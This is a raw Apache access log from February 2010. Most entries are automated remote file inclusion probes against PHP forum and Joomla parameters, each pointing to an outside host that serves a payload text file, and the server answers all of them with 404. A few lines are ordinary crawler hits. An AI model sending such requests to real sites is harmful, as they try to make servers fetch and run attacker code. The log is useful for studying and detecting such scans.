66.254.98.142 - - [23/Feb/2010:02:21:10 -0500] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
66.249.71.219 - - [23/Feb/2010:02:21:23 -0500] "GET /images/bt_background.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
74.208.14.52 - - [23/Feb/2010:02:21:28 -0500] "GET /logs/access_log.Q110020500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.208.14.52 - - [23/Feb/2010:02:21:28 -0500] "GET /logs/access_log.Q109101000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:21:33 -0500] "GET /logs/error_log.Q110021600%20%20//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:21:33 -0500] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.172.33.230 - - [23/Feb/2010:02:21:36 -0500] "GET /logs/access_log.Q109052000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:21:37 -0500] "GET //bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
123.125.66.58 - - [23/Feb/2010:02:21:39 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.254.172.27 - - [23/Feb/2010:02:21:43 -0500] "GET /http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.93.147.154 - - [23/Feb/2010:02:21:44 -0500] "GET /index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
